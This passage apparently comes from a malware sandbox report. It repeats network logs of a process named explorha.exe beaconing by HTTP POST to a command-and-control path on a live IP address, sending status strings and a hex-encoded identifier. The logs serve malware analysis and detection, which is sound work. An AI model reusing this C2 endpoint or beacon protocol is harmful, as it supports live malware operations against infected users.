                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
Apr 19, 2024 04:26:37.957173109 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:37 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
Apr 19, 2024 04:26:37.957972050 CEST | 310 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Apr 19, 2024 04:26:38.209005117 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:38 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.4 | 49777 | 193.233.132.56 | 80 | 5900 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 04:26:38.615402937 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
Apr 19, 2024 04:26:38.863049030 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:38 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
Apr 19, 2024 04:26:38.863713980 CEST | 310 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Apr 19, 2024 04:26:39.115093946 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:38 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.2.4 | 49778 | 193.233.132.56 | 80 | 5900 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 04:26:39.468272924 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
Apr 19, 2024 04:26:39.713409901 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:39 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
Apr 19, 2024 04:26:39.714193106 CEST | 310 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Apr 19, 2024 04:26:39.963736057 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:39 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.4 | 49779 | 193.233.132.56 | 80 | 5900 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 04:26:40.314527035 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
Apr 19, 2024 04:26:40.562366009 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:40 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
Apr 19, 2024 04:26:40.563909054 CEST | 310 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Apr 19, 2024 04:26:40.816369057 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:40 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.2.4 | 49780 | 193.233.132.56 | 80 | 5900 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 04:26:41.169487000 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
Apr 19, 2024 04:26:41.413405895 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:41 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
Apr 19, 2024 04:26:41.414042950 CEST | 310 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Apr 19, 2024 04:26:41.663165092 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:41 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
45 | 192.168.2.4 | 49781 | 193.233.132.56 | 80 | 5900 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 04:26:42.013973951 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
Apr 19, 2024 04:26:42.257725000 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:42 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
Apr 19, 2024 04:26:42.258369923 CEST | 310 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Apr 19, 2024 04:26:42.507534027 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:42 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
46 | 192.168.2.4 | 49782 | 193.233.132.56 | 80 | 5900 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 04:26:42.851830006 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
Apr 19, 2024 04:26:43.090806007 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:42 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
Apr 19, 2024 04:26:43.091510057 CEST | 310 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Apr 19, 2024 04:26:43.336544991 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:43 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
47 | 192.168.2.4 | 49783 | 193.233.132.56 | 80 | 5900 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 04:26:43.685111046 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
Apr 19, 2024 04:26:43.928663015 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:43 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:43.929373980 CEST  310  OUT  POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:26:44.177284002 CEST  196  IN  HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:44 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                    48  192.168.2.4  49784  193.233.132.56  80  5900  C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                                                    Apr 19, 2024 04:26:44.538659096 CEST  158  OUT  POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:26:44.790668011 CEST  219  IN  HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:44 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:44.791507959 CEST  310  OUT  POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:26:45.047224045 CEST  196  IN  HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:44 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                    49  192.168.2.4  49785  193.233.132.56  80  5900  C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                                                    Apr 19, 2024 04:26:45.405383110 CEST  158  OUT  POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:26:45.651685953 CEST  219  IN  HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:45 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:45.653119087 CEST  310  OUT  POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:26:45.903750896 CEST  196  IN  HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:45 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                    50  192.168.2.4  49786  193.233.132.56  80  5900  C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                                                    Apr 19, 2024 04:26:46.264699936 CEST  158  OUT  POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:26:46.509696960 CEST  219  IN  HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:46 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:46.510546923 CEST  310  OUT  POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
